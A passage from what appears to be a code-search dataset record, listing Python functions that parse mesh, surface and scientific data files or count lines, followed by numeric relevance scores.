self.nTim\n\t\t\tnTim = nTim - 1 if self.timTC == \"t\" and not includeTotalBin else nTim\n\t\t\treturn nTim", "def read_txt(if_name):\n n = 0\n paper_shape = []\n present_shape = []\n input_file = open(if_name,'r')\n i = 0\n\n for line in input_file:\n\n if i > 1:\n\n i += 1\n line = line.strip().split(' ')\n if len(line) < 2:\n break\n present_shape.append([int(e) for e in line])\n\n if i == 1:\n i += 1\n line = line.strip()\n n = int(line)\n\n if i == 0:\n i += 1\n line = line.strip().split(' ')\n paper_shape = [int(e) for e in line]\n\n input_file.close()\n return n, paper_shape, present_shape", "def bpCount(file):\n amount_bp = len(file)\n return amount_bp", "def get_all_object_triangles( filename, scale , translation=(0,0,0)):\n import warnings\n warnings.warn(\"@PendingDeprecationWarning\", PendingDeprecationWarning)\n vertexObjs = read_vertices_objects( filename )\n faceObjs = read_faces_objects( filename )\n\n r = []\n j = 0\n \n # Validation:\n vertices, faces = [],[]\n for obj in range(len(vertexObjs)):\n vertices += vertexObjs[obj]\n faces += faceObjs[obj]\n max_vertex_index = max([max(x) for x in faces])\n if len(vertices) != max_vertex_index:\n logging.warning( \"ParseWarning: A face's vertex index number is does not match the quantity of read vertices.\" )\n logging.warning( \"Qty of Vertices: \"+str(len(vertices))+\", Largest Face Index: \"+str(max_vertex_index) )\n\n # Parse as Tris:\n for obj in range(len(vertexObjs)):\n vertices = vertexObjs[obj]\n faces = faceObjs[obj]\n r.append([])\n c = 0\n for f in faces: # for every face\n for i in f: # for each index point in face\n c+=1\n try:\n # Get the face[i] vertex\n v = vertices[i-1]\n except IndexError as indErr:\n logging.warning(\"IndexError: Attempted to access index: \"+str(i-1)+\" in list of length: \"+str(len(vertices)))\n raise IndexError\n # Scale the face[i] vertex\n scV = [v[0]*scale, v[1]*scale, v[2]*scale]\n # Translate the scaled face vertex:\n t = translation\n tmpv = [scV[0]+t[0],scV[1]+t[1], scV[2]+t[2]]\n # Retain this vertex\n r[j].append(tmpv)\n # ---------------------\n if c % 3 == 0:\n j+=1\n r.append([])\n r = r[:len(r)-1] 
# remove the final empty list.\n\n checkShapeValidity( r )\n return r", "def load_triangles(triangle_bytes, header):\n triangles = list()\n for i in range(header.num_tris):\n triangle = triangle_t(list(struct.unpack(\"<hhh\", triangle_bytes[12*i:12*i+6])), list(struct.unpack(\"<hhh\", triangle_bytes[12*i+6:12*i+12])))\n # print(triangle)\n triangles.append(triangle)\n return triangles", "def test_number_of_surface_objects(self):\n for O in self.mod.objts.itervalues():\n no_of_surfaces = 0\n for C in O.conts.itervalues():\n if C.surf != 0:\n no_of_surfaces += 1\n self.assertEqual(O.surfsize, no_of_surfaces)", "def dimensions():", "def test_number_of_vertex_elements_in_MESH_chunk(self):\n for O in self.mod.objts.itervalues():\n for M in O.meshes.itervalues():\n self.assertEqual(M.vsize, len(M.vert))", "def read_triangle(f, layers=1):\n # Read nodes\n with open(f + '.node') as h:\n num_nodes = int(h.readline().split(' ')[0])\n node_values = np.zeros((num_nodes, 2), dtype=np.float64)\n for line in h:\n if line[0] == '#':\n continue\n node, x, y = line.split()[:3]\n node_values[int(node) - 1, :] = [float(x), float(y)]\n\n nodes = op2.Set(num_nodes, \"nodes\")\n coords = op2.Dat(nodes ** 2, node_values, name=\"coords\")\n\n # Read elements\n with open(f + '.ele') as h:\n num_tri, nodes_per_tri, num_attrs = [int(x) for x in h.readline().split()]\n map_values = np.zeros((num_tri, nodes_per_tri), dtype=np.int32)\n for line in h:\n if line[0] == '#':\n continue\n vals = [int(x) - 1 for x in line.split()]\n map_values[vals[0], :] = vals[1:nodes_per_tri + 1]\n\n elements = op2.Set(num_tri, \"elements\", layers=layers)\n elem_node = op2.Map(elements, nodes, nodes_per_tri, map_values, \"elem_node\")\n\n return nodes, coords, elements, elem_node", "def get_number_lines(running_reward_file, running_loss_file, action_count_file):\n if Path(running_reward_file).exists():\n data = np.loadtxt(running_reward_file).reshape(-1,2)\n return data.shape[0]\n if Path(running_loss_file).exists():\n data = np.loadtxt(running_loss_file).reshape(-1,2)\n return data.shape[0]\n if Path(action_count_file).exists():\n data = np.loadtxt(action_count_file).reshape(-1,2)\n return data.shape[0]\n raise NameError(\"No files to count lines\")", "def get_dataset_length(file_path, had_header=True):\n with open(file_path, 'r') as f:\n length = 0\n for _ in f:\n length += 1\n length = length - had_header\n return length", "def __len__(self) -> int:\n import h5py\n\n with h5py.File(\n os.path.join(self.root, self.data_dir, self.img_file_name), \"r\"\n ) as f:\n num_datapoints: int = f[self.split][\"pv_log\"].shape[0]\n\n return num_datapoints", "def get_library_sizes(args):\n with open(args.counts, \"r\") as counts:\n sizes = []\n head = True\n for line in counts:\n line = line.strip()\n if head:\n head = False\n samples = line.split(\"\\t\")[3:]\n total_counts = [0] * len(samples)\n else:\n counts = line.split(\"\\t\")\n if counts[1] == \"NA\":\n break\n else:\n counts = counts[3:]\n for i in range(len(counts)):\n total_counts[i] += int(counts[i])\n\n for i in range(len(samples)):\n sizes.append([samples[i], total_counts[i]])\n\n return sizes", "def data_len(self):\n Nrows_data = 0\n with self._compression_safe_file_opener(self.input_fname, \"r\") as f:\n for i, l in enumerate(f):\n if (l[0 : len(self.header_char)] != self.header_char) and (l != \"\\n\"):\n Nrows_data += 1\n return Nrows_data", "def getFileCount(self) -> int:\n ...", "def test_number_of_MESH_chunks(self):\n for O in self.mod.objts.itervalues():\n 
self.assertEqual(O.meshsize, len(O.meshes))", "def _tvb_surface_to_tri(self, surface_file_name):\n surface_file_path = os.path.join(OM_STORAGE_DIR, surface_file_name)\n\n #TODO: check file doesn't already exist\n LOG.info(\"Writing TVB surface to .tri file: %s\" % surface_file_path)\n file_handle = file(surface_file_path, \"a\")\n\n file_handle.write(\"- %d \\n\" % self.sources.number_of_vertices)\n verts_norms = numpy.hstack((self.sources.vertices, \n self.sources.vertex_normals))\n numpy.savetxt(file_handle, verts_norms)\n\n tri_str = \"- \" + (3 * (str(self.sources.number_of_triangles) + \" \")) + \"\\n\"\n file_handle.write(tri_str)\n numpy.savetxt(file_handle, self.sources.triangles, fmt=\"%d\")\n\n file_handle.close()\n LOG.info(\"%s written successfully.\" % surface_file_name)\n\n return surface_file_path", "def dataDimensions(data):\n logging.info('Number of rows of data: %s' % len(data))\n logging.info('Number of columns of data: %s' % len(data[1]))", "def _extract_track_lengths(track_key,conn):\n print track_key\n \n (fname,iden_key,track_key) = conn.execute(\"select fout,iden_key,comp_key from tracking where comp_key = ?\",\n track_key).fetchone()\n \n F = h5py.File(fname,'r')\n len_vec = F[fd('tracking',track_key)]['length'][:]\n \n temp = 0\n dtime = 0\n fr_count = 0\n for g in F.keys():\n if g[0:5] == 'frame':\n temp += F[g].attrs['temperature']\n dtime += F[g].attrs['dtime']\n fr_count += 1\n\n \n F.close()\n del F\n return len_vec, temp/fr_count, dtime/fr_count", "def ss_triangle_count(graph: ScipyGraph) -> int:\n props = ScipyGraph.Type.compute_abstract_properties(graph, {\"edge_type\"})\n if props[\"edge_type\"] == \"map\":\n # Drop weights before performing triangle count\n m = graph.value.copy()\n m.data = np.ones_like(m.data)\n elif props[\"edge_type\"] == \"set\":\n m = graph.value\n L = ss.tril(m, k=-1).tocsr()\n U = ss.triu(m, k=1).tocsc()\n return int((L @ U.T).multiply(L).sum())", "def analyze_pressure_dump(filename, Lx=200., Ly=200, Lz=900., N=10, bin_divide_flag=False, Natoms=113579):\n myfile = open(filename+'.txt')\n trajectory = []\n traj_pd = []\n frames = []\n\n for _ in range(3):\n next(myfile)\n count = 0\n while EOF(myfile):\n count += 1\n s = next(myfile) # info with the time step\n\n x = np.zeros(N, dtype=[('Chunk',np.float32), ('Coord1',np.float32), ('Ncount',np.float32), ('density',np.float32), ('temp',np.float32), ('vx',np.float32), ('fx',np.float32),('c_pciKE[1]',np.float32), ('c_pciKE[2]',np.float32), ('c_pciKE[3]',np.float32), ('c_pciVIR[1]',np.float32), ('c_pciVIR[2]',np.float32), ('c_pciVIR[3]',np.float32), ('c_pgelELAS[1]',np.float32), ('c_pgelELAS[2]',np.float32), ('c_pgelELAS[3]',np.float32), ('c_pgelVIR[1]', np.float32), ('c_pgelVIR[2]', np.float32), ('c_pgelVIR[3]', np.float32), ('c_pgelPAIR[1]', np.float32), ('c_pgelPAIR[2]', np.float32), ('c_pgelPAIR[3]', np.float32)])\n\n# Chunk Coord1 Ncount density/number temp vx fx c_pciKE[1] c_pciKE[2] c_pciKE[3] c_pciVIR[1] c_pciVIR[2] c_pciVIR[3] c_pgelELAS[1] c_pgelELAS[2] c_pgelELAS[3] c_pgelVIR[1] c_pgelVIR[2] c_pgelVIR[3] c_pgelPAIR[1] c_pgelPAIR[2] c_pgelPAIR[3]\n\n list_line = re.findall(\"[-+]?\\d+[\\.]?\\d*[eE]?[-+]?\\d*\", s)\n frame, _, _ = list_line\n frames.append(int(frame))\n # print( \"reading lines\")\n\n for i in xrange(N):\n count += 1\n s = next(myfile)\n list_line = re.findall(\"[-+]?\\d+[\\.]?\\d*[eE]?[-+]?\\d*\", s)\n # print( \"reading line\", i, list_line)\n for il, l in enumerate(list_line):\n x[i][il] = float(l)\n\n trajectory.append(x)\n\n # names = 
x.dtype.fields.keys()\n # data = x.dtype.fields.values()\n\n df = pd.DataFrame.from_records(x)\n traj_pd.append(df)\n\n myfile.close()\n\n\n\n # # volume = 218.*44.*44.\n volume = Lx*Ly*Lz\n # N_atoms = 113579\n # if bin_divide_flag:\n # bin_volume = volume / float(N)\n # else:\n # bin_volume = 1.\n\n bin_volume = volume / float(N)\n # bin_volume = volume\n # bin_volume /= float(Natoms)\n\n Combine_PD = pd.concat(traj_pd)\n FINAL_PD = pd.DataFrame()\n\n FINAL_PD['Coord1'] = Combine_PD['Coord1']\n FINAL_PD['p_ciKE'] = -1 * Combine_PD['Ncount'] * (Combine_PD['c_pciKE[1]'] + Combine_PD['c_pciKE[2]'] + Combine_PD['c_pciKE[3]'])/(3.*bin_volume)\n FINAL_PD['p_ciVIR'] = -1 * Combine_PD['Ncount'] * (Combine_PD['c_pciVIR[1]'] + Combine_PD['c_pciVIR[2]'] + Combine_PD['c_pciVIR[3]'])/(3.*bin_volume)\n FINAL_PD['p_gelELAS'] = -1 * Combine_PD['Ncount'] * (Combine_PD['c_pgelELAS[1]'] + Combine_PD['c_pgelELAS[2]'] + Combine_PD['c_pgelELAS[3]'])/(3.*bin_volume)\n\n FINAL_PD['p_gelVIR'] = -1 * Combine_PD['Ncount'] * (Combine_PD['c_pgelVIR[1]'] + Combine_PD['c_pgelVIR[2]'] + Combine_PD['c_pgelVIR[3]'])/(3.*bin_volume)\n FINAL_PD['p_gelPAIR'] = -1 * Combine_PD['Ncount'] * (Combine_PD['c_pgelPAIR[1]'] + Combine_PD['c_pgelPAIR[2]'] + Combine_PD['c_pgelPAIR[3]'])/(3.*bin_volume)\n\n # So now I have to\n # P_bin = (sigma_per_atom_xx + ... + sigma_per_atom_zz)/(bin_volume*3)\n # *N_atoms_per_bin\n # N_atoms_per_bin = number_density*N_atoms\n\n\n df_concat = FINAL_PD\n\n by_row_index = df_concat.groupby(df_concat.index)\n df_means = by_row_index.mean()\n by_row_index_2 = df_concat.groupby(df_concat.index)\n df_stds = by_row_index_2.std()\n\n # print( df_means.head())\n # print( df_stds.head())\n return df_means, df_stds", "def fileCount(self):\n pass", "def count_lines(filename):\n with open(filename, 'r', encoding='utf-8') as file:\n lines_count = int()\n for line in file:\n lines_count += 1\n info_tuple = (filename, lines_count)\n return info_tuple", "def _ReadExtent(self):\n # Read the mesh file as line strings, remove lines with comment = !\n v = np.array(np.__version__.split('.')[0:2], dtype=int)\n FileName = self.GetMeshFileName()\n try:\n if v[0] >= 1 and v[1] >= 10:\n # max_rows in numpy versions >= 1.10\n msh = np.genfromtxt(FileName, delimiter='\\n', dtype=np.str,comments='!', max_rows=1)\n else:\n # This reads whole file :(\n msh = np.genfromtxt(FileName, delimiter='\\n', dtype=np.str, comments='!')[0]\n except (IOError, OSError) as fe:\n raise _helpers.PVGeoError(str(fe))\n # Fist line is the size of the model\n self.__sizeM = np.array(msh.ravel()[0].split(), dtype=int)\n # Check if the mesh is a UBC 2D mesh\n if self.__sizeM.shape[0] == 1:\n # Read in data from file\n xpts, xdisc, zpts, zdisc = ubcMeshReaderBase._ubcMesh2D_part(FileName)\n nx = np.sum(np.array(xdisc,dtype=int))+1\n nz = np.sum(np.array(zdisc,dtype=int))+1\n return (0,nx, 0,1, 0,nz)\n # Check if the mesh is a UBC 3D mesh or OcTree\n elif self.__sizeM.shape[0] >= 3:\n # Get mesh dimensions\n dim = self.__sizeM[0:3]\n ne,nn,nz = dim[0], dim[1], dim[2]\n return (0,ne, 0,nn, 0,nz)\n else:\n raise _helpers.PVGeoError('File format not recognized')", "def get_num_chunks(self) -> int:", "def part2(fname: dict) -> int:\n return sum(len(set.intersection(*[set(pax) for pax in group])) for group in get_data(fname))", "def voxel_count(self):\n return self.cols * self.rows * self.sections", "def calc_face_dimensions(face):\n vertical = filter_vertical_edges(face.edges, face.normal).pop()\n horizontal = filter_horizontal_edges(face.edges, 
face.normal).pop()\n return horizontal.calc_length(), vertical.calc_length()", "def _count_data(path):\n matcher = re.compile(r'[0-9]+\\.dec')\n match = lambda name: bool(matcher.match(name))\n names = os.listdir(path)\n n_data = len(list(filter(match, names)))\n return n_data", "def file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n Nrows = i + 1\n return Nrows", "def ReadFenics(self, filename, element_type):\n\n if element_type == \"tet\":\n etype = \"tetrahedron\"\n elif element_type == \"hex\":\n etype = \"hexahedron\"\n elif element_type == \"tri\":\n etype = \"triangle\"\n elif element_type == \"quad\":\n etype = \"quadrilateral\"\n\n import xml.etree.cElementTree as ET\n root = ET.parse(filename).getroot()\n X = []\n T = []\n for child in root:\n if child.attrib['celltype'] != etype:\n raise ValueError(\"xml file does not contain {} elements\".format(element_type))\n\n for child in root:\n for cchild in child:\n if cchild.tag == \"vertices\":\n if element_type == \"tet\" or element_type == \"hex\":\n for child3 in cchild:\n x = float(child3.attrib['x'])\n y = float(child3.attrib['y'])\n z = float(child3.attrib['z'])\n X.append([x,y,z])\n elif element_type == \"tri\" or element_type == \"quad\":\n for child3 in cchild:\n x = float(child3.attrib['x'])\n y = float(child3.attrib['y'])\n X.append([x,y])\n\n elif cchild.tag == \"cells\":\n if element_type == \"tet\":\n for child3 in cchild:\n v0 = int(child3.attrib['v0'])\n v1 = int(child3.attrib['v1'])\n v2 = int(child3.attrib['v2'])\n v3 = int(child3.attrib['v3'])\n T.append([v0,v1,v2,v3])\n elif element_type == \"tri\":\n for child3 in cchild:\n v0 = int(child3.attrib['v0'])\n v1 = int(child3.attrib['v1'])\n v2 = int(child3.attrib['v2'])\n T.append([v0,v1,v2])\n\n\n X = np.array(X)\n T = np.array(T,dtype=np.int64)\n\n self.elements = T\n self.points = X\n self.element_type = element_type\n self.nelem = self.elements.shape[0]\n self.nnode = self.points.shape[0]\n\n if self.points.shape[1] == 3:\n if np.allclose(self.points[:,2],0.):\n self.points = np.ascontiguousarray(self.points[:,:2])\n\n ndim = self.InferSpatialDimension()\n if self.element_type == \"tri\" or self.element_type == \"quad\":\n self.GetEdges()\n self.GetBoundaryEdges()\n elif self.element_type == \"tet\" or self.element_type == \"hex\":\n self.GetFaces()\n self.GetBoundaryFaces()\n self.GetBoundaryEdges()", "def read_geometry(filepath, read_metadata=False, read_stamp=False):\n volume_info = OrderedDict()\n\n TRIANGLE_MAGIC = 16777214\n QUAD_MAGIC = 16777215\n NEW_QUAD_MAGIC = 16777213\n with open(filepath, \"rb\") as fobj:\n magic = _fread3(fobj)\n if magic in (QUAD_MAGIC, NEW_QUAD_MAGIC): # Quad file\n nvert = _fread3(fobj)\n nquad = _fread3(fobj)\n (fmt, div) = (\">i2\", 100.) 
if magic == QUAD_MAGIC else (\">f4\", 1.)\n coords = np.fromfile(fobj, fmt, nvert * 3).astype(np.float) / div\n coords = coords.reshape(-1, 3)\n quads = _fread3_many(fobj, nquad * 4)\n quads = quads.reshape(nquad, 4)\n #\n # Face splitting follows\n #\n faces = np.zeros((2 * nquad, 3), dtype=np.int)\n nface = 0\n for quad in quads:\n if (quad[0] % 2) == 0:\n faces[nface] = quad[0], quad[1], quad[3]\n nface += 1\n faces[nface] = quad[2], quad[3], quad[1]\n nface += 1\n else:\n faces[nface] = quad[0], quad[1], quad[2]\n nface += 1\n faces[nface] = quad[0], quad[2], quad[3]\n nface += 1\n\n elif magic == TRIANGLE_MAGIC: # Triangle file\n create_stamp = fobj.readline().rstrip(b'\\n').decode('utf-8')\n fobj.readline()\n vnum = np.fromfile(fobj, \">i4\", 1)[0]\n fnum = np.fromfile(fobj, \">i4\", 1)[0]\n coords = np.fromfile(fobj, \">f4\", vnum * 3).reshape(vnum, 3)\n faces = np.fromfile(fobj, \">i4\", fnum * 3).reshape(fnum, 3)\n\n if read_metadata:\n volume_info = _read_volume_info(fobj)\n else:\n raise ValueError(\"File does not appear to be a Freesurfer surface\")\n\n coords = coords.astype(np.float) # XXX: due to mayavi bug on mac 32bits\n\n ret = (coords, faces)\n if read_metadata:\n if len(volume_info) == 0:\n warnings.warn('No volume information contained in the file')\n ret += (volume_info,)\n if read_stamp:\n ret += (create_stamp,)\n\n return ret", "def readCubeFile(self, filename):\n\n inputfile = open(filename, \"r\")\n header = \"\".join([inputfile.readline(), inputfile.readline()])\n\n temp = inputfile.readline().strip().split()\n self.numAtoms = int(temp[0])\n self.origin = list(map(float, temp[1:]))\n\n self.numPoints = [0] * 3\n self.spacing = [0] * 3\n for i in range(3):\n line = inputfile.readline().strip().split()\n self.numPoints[i] = int(line[0])\n temp = list(map(float, line[1:]))\n self.spacing[i] = temp[i]\n assert sum(temp[:i] + temp[i + 1:]) == 0\n\n # Read in the lines with atom data\n for i in range(self.numAtoms):\n line = inputfile.readline()\n\n self.data = np.zeros((self.numPoints[1], self.numPoints[0], self.numPoints[2]), \"float\")\n i = j = k = 0\n while i < self.numPoints[1]:\n line = next(inputfile)\n temp = list(map(float, line.strip().split()))\n for x in range(0, len(temp)):\n self.data[j, i, x + k] = temp[x]\n\n k += len(temp)\n if k == self.numPoints[2]:\n j += 1\n k = 0\n if j == self.numPoints[1]:\n i += 1\n j = 0\n\n inputfile.close()", "def parseInputFile(fn):\n\twith open(fn) as f:\n\t\tpoly = [float(x) for x in f.readline().strip().split()]\n\t\titers = int(f.readline().strip())\n\t\treturn (poly, iters)", "def load_faces(file_data, headers, indices):\n\n\n def swap_winding(indices):\n return (indices[0], indices[2], indices[1])\n \n\n def indices_from_face(face_data):\n base_vertex = face_data[3]\n base_index = face_data[5]\n index_count = face_data[6]\n\n faces_indices = [base_vertex + indices[base_index + current_index] \n for current_index in range(index_count)]\n\n #Split into lists of 3 - ie triangles\n faces = []\n for current_face_idx in range(0, len(faces_indices), 3):\n faces.append(faces_indices[current_face_idx:current_face_idx+3])\n\n return faces\n\n\n def face_from_pack(face_data):\n \"\"\" \n Extract just the data we want from the full chunk\n \"\"\"\n triangle_list = indices_from_face(face_data)\n return [(face_data[0], triangles,) for triangles in triangle_list]\n\n face_offset, face_length = headers[13]\n face_chunk = Struct(\"iiiiiiii2i2i3f3f3f3f2i\") \n face_size = face_chunk.size\n face_count = int(face_length / face_size)\n\n 
faces = []\n\n for current_face_idx in range(face_count):\n face_file_position = face_offset + current_face_idx * face_size\n current_face = face_chunk.unpack(file_data[face_file_position : face_file_position+face_size])\n\n #Check we are a valid face (Could use a filter later)\n if current_face[2] != 1: continue #Only support meshes at the moment\n\n new_faces = face_from_pack(current_face)\n faces.extend(new_faces)\n\n return faces", "def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios", "def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios", "def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios", "def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios", "def get_filesize(inputfile) -> int:\n with open(inputfile, \"rb\") as f:\n lines = 0\n buf_size = 1024 * 1024\n read_f = f.raw.read\n\n buf = read_f(buf_size)\n while buf:\n lines += buf.count(b\"\\n\")\n buf = read_f(buf_size)\n\n return lines", "def extract_triangles(mesh, materials_list):\n tri_list = []\n do_uv = bool(mesh.tessface_uv_textures)\n\n for mat in materials_list:\n for i, face in enumerate(mesh.tessfaces):\n f_v = face.vertices\n if mesh.materials[face.material_index].name != mat: continue\n\n uf = mesh.tessface_uv_textures.active.data[i] if do_uv else None\n\n fmt = 0\n if(do_uv): fmt = face.material_index\n\n if do_uv:\n f_uv = uf.uv\n\n if len(f_v) == 3:\n new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), fmt)\n if (do_uv):\n new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])\n else: new_tri.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n tri_list.append(new_tri)\n\n else: # it's a quad\n new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), fmt)\n new_tri_2 = tri_wrapper((f_v[0], f_v[2], f_v[3]), fmt)\n\n if (do_uv):\n new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])\n new_tri_2.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[2]), uv_key(f_uv[3])\n else:\n new_tri.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n new_tri_2.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n\n tri_list.append(new_tri)\n tri_list.append(new_tri_2)\n\n return tri_list", "def N_POINTS(self) -> int:\n try:\n with self.fs.open(\n self.get_url().replace(\".\" + self.erddap.response, \".ncHeader\")\n ) as of:\n ncHeader = of.read().decode(\"utf-8\")\n lines = [line for line in ncHeader.splitlines() if \"row = \" in line][0]\n return int(lines.split(\"=\")[1].split(\";\")[0])\n except Exception:\n pass", "def get_n(self):\n return np.append([self.n_init],[s.n for s in self.surfaces])", "def inithr(_filename):\n # Open file provided\n _file = open(_filename)\n # Create empty array to hold data\n _data = np.zeros((1, 3), dtype=float)\n\n # Iterate through the file line by line\n for _line in _file:\n # Split each line into constituent values\n _x = _line.split()\n # Append data array with each value, converted to float, convert parallax angle to distance\n _data = np.append(_data, np.array([float(_x[1]), float(_x[2]), (1 / float(_x[3]))], ndmin=2), axis=0)\n\n # Iterate through data array\n for _row in _data:\n np.seterr(divide='ignore')\n # Convert magnitude to luminosity\n _row[0] = _row[0] - 5 * (np.log10(_row[2]) - 1)\n # Convert B-V colour to temperature\n _row[1] = 4600 * ((1 / (0.92 * _row[1] + 1.7)) + 1 / (0.92 * _row[1] + 0.62))\n\n # Delete first empty row\n _data = np.delete(_data, 0, axis=0)\n\n # Return parsed data\n return 
_data", "def read_file(file):\n if opts.input_type == 'fits':\n data = fileio.read_fits(file)\n else:\n data = fileio.read_ascii(file)\n c_id = data[0,:]\n g_num = np.array(range(len(c_id)), dtype = 'int')\n g_id = data[3,:]\n g_ra = np.array(data[4,:], dtype = 'float')\n g_dec = np.array(data[5,:], dtype = 'float')\n g_z = np.array(data[6,:], dtype = 'float')\n return c_id, g_num, g_id, g_ra, g_dec, g_z", "def bufcount(filename):\n\timport gzip\n\tif filename.split('.')[-1] in ['gz','gzip']: f = gzip.open(filename)\n\telse: f = open(filename)\n\tlines = 0\n\tbuf_size = 1024 * 1024\n\tread_f = f.read # loop optimization\n\t\n\tbuf = read_f(buf_size)\n\twhile buf:\n\t\tlines += buf.count('\\n')\n\t\tbuf = read_f(buf_size)\n\t\tf.close\n\treturn lines", "def part2(filename: str) -> int:\n data = first_line(filename)\n data = json.loads(data)\n return total_nums_no_red(data)", "def compute_surface_area(self):\n return np.sum(self._find_triangle_areas())", "def part_1() -> int:\n initial_input = _load_input()\n rows = len(initial_input)\n cols = len(initial_input[0])\n\n input = initial_input.copy()\n total_glow_count = 0\n\n for _ in range(100):\n flashed = list()\n for row in range(rows):\n for col in range(cols):\n coords = [[col, row]]\n new_input, glow_count = _get_glow_counts(coords, input, flashed)\n input = new_input\n total_glow_count += glow_count\n\n return total_glow_count", "def get_data(data_file_path):\n data_file = open(data_file_path, 'r').readlines()\n data = []\n n = -1\n dim = -1\n for i in range(len(data_file)):\n line_elems = [float(x) for x in data_file[i].split()]\n if i == 0:\n n = int(line_elems[0])\n dim = int(line_elems[1])\n else:\n data.append(np.array(line_elems))\n return data, n, dim", "def get_faces_nr(self):\r\n\r\n logger.debug('Getting number of faces in each frame')\r\n\r\n if len(self.tracked_faces) == 0:\r\n\r\n # Try to load YAML file\r\n\r\n if os.path.exists(self.track_path):\r\n\r\n print 'Loading YAML file with tracking results'\r\n logger.debug('Loading YAML file with tracking results')\r\n\r\n with open(self.track_path) as f:\r\n\r\n self.tracked_faces = yaml.load(f)\r\n\r\n print 'YAML file with tracking results loaded'\r\n logger.debug('YAML file with tracking results loaded')\r\n\r\n else:\r\n\r\n print 'Warning! 
No tracking results found!'\r\n logger.warning('No tracking results found!')\r\n\r\n return\r\n\r\n self.faces_nr = {}\r\n\r\n for segment_dict in self.tracked_faces:\r\n\r\n frame_list = segment_dict[c.FRAMES_KEY]\r\n\r\n for frame_dict in frame_list:\r\n\r\n frame_name = frame_dict[c.SAVED_FRAME_NAME_KEY]\r\n\r\n if frame_name in self.faces_nr:\r\n\r\n self.faces_nr[frame_name] += 1\r\n\r\n else:\r\n\r\n self.faces_nr[frame_name] = 1\r\n\r\n # Save YAML file\r\n\r\n utils.save_YAML_file(self.faces_nr_path, self.faces_nr)", "def readprimitive(f): \n \n ## read in lines from input file and ignore blank lines and comment lines\n lines = [line.rstrip() for line in f if line.rstrip() if line[0] != '#']\n\n # a1,a2,a3\n A = np.array([[float(lines[0].split()[0]),float(lines[0].split()[1]),float(lines[0].split()[2])],\n [float(lines[1].split()[0]),float(lines[1].split()[1]),float(lines[1].split()[2])],\n [float(lines[2].split()[0]),float(lines[2].split()[1]),float(lines[2].split()[2])]]).T\n \n # number of basis atoms\n num_basis = int(lines[3].split()[0]) \n\n # basis atom positions in unit cell\n unitcell_pos = []\n for i in range(num_basis): \n unitcell_pos.append([float(lines[4+i].split()[0]),float(lines[4+i].split()[1]),float(lines[4+i].split()[2])]) \n \n return (A,unitcell_pos)", "def part1(filename: str) -> int:\n data = first_line(filename)\n data = json.loads(data)\n return total_nums(data)", "def obtener_cantidad_vertices(self):\n return len(self.vertices.keys())", "def get_counts(filename, alphabet, kmin, kmax):\n # get the list of kmers to count with length between kmin and kmax\n kmers_list = get_all_possible_kmers(alphabet, kmin, kmax)\n # initialyze the counter with all possible kmer with length\n # between kmin and kmax with zero counts\n counter = Counter(dict([(km, 0) for km in kmers_list]))\n # open and read in the kmers/string in the file\n with gzip.open(filename, 'rt') as fh:\n # iterates through the strings\n for line in fh:\n # make the adjustments int the strings\n kmer = line.replace('\\n', '')\n # check if kmer/string is in the counter\n if kmer in counter:\n # if kmer is in add 1 other wise keep the zero count\n counter[kmer] += 1\n return counter", "def load_verts(file_data, headers, scale_factor):\n\n\n def vert_from_pack(vert_data):\n return (\n (vert_data[0] * scale_factor, vert_data[1] * scale_factor, vert_data[2] * scale_factor,), #XYZ\n (vert_data[3], vert_data[4],), #UV1\n (vert_data[5], vert_data[6],), #UV2\n (vert_data[7], vert_data[8], vert_data[9],), #Normal\n (vert_data[10], vert_data[11], vert_data[12], vert_data[13],), #RGBA\n )\n\n vert_offset, vert_length = headers[10]\n vert_chunk = Struct(\"3f2f2f3f4B\") \n vert_size = vert_chunk.size\n vert_count = int(vert_length / vert_size)\n\n print (\"Found {} vertices\".format(vert_count))\n\n vertices = []\n\n for current_vert_idx in range(vert_count):\n vert_file_position = vert_offset + current_vert_idx * vert_size\n current_vert = vert_chunk.unpack(file_data[vert_file_position : vert_file_position+vert_size])\n vertices.append(vert_from_pack(current_vert))\n\n return vertices", "def get_number_of_letters(self):\n filename = f'{self.path}/{self.filename}'\n file = open(filename, 'r', encoding='utf-8')\n \"\"\"Count number of lettes without digits, non letter characters, without xml tags\"\"\"\n data = file.read()\n data = re.sub('<.*?binary.*?>*<.*?binary.*?>',' ', data)\n data = re.sub('\\\\s\\\\s*', '', (re.sub('\\\\W|\\\\d', ' ', re.sub('<.*?>', '', data))))\n let_count = len(data)\n 
sqlite_for_ht.CreateTable.update_table(f_1, self.filename, 'number_of_letters', let_count)\n print(datetime.now(), '-', 'number_of_letters for', self.filename, 'calculated =', let_count)\n return None" ]
[ "0.78216827", "0.65307426", "0.64875203", "0.6224915", "0.6100354", "0.60187995", "0.59512895", "0.5924314", "0.59203315", "0.5906817", "0.59059787", "0.5882943", "0.5867339", "0.585497", "0.58549577", "0.5812365", "0.57997227", "0.57795846", "0.57746047", "0.57551175", "0.5748937", "0.5748146", "0.5725021", "0.5702728", "0.5698386", "0.5691206", "0.56838804", "0.56726533", "0.5660846", "0.5656267", "0.5645008", "0.56413954", "0.56186074", "0.56131804", "0.5612977", "0.5591385", "0.55882674", "0.5583263", "0.55814636", "0.55635816", "0.55606204", "0.55409354", "0.5535321", "0.55073744", "0.55027145", "0.5488749", "0.5487895", "0.54793304", "0.54753", "0.5460062", "0.54573315", "0.54482156", "0.54470176", "0.54455364", "0.5443752", "0.5437656", "0.5428198", "0.5427783", "0.541538", "0.54097253", "0.5398149", "0.53920686", "0.5391353", "0.5389164", "0.5385579", "0.53842545", "0.5364776", "0.5356398", "0.5355718", "0.53523314", "0.5346526", "0.53442633", "0.53398955", "0.5333428", "0.5324331", "0.5324294", "0.53221965", "0.5320378", "0.5317432", "0.5317432", 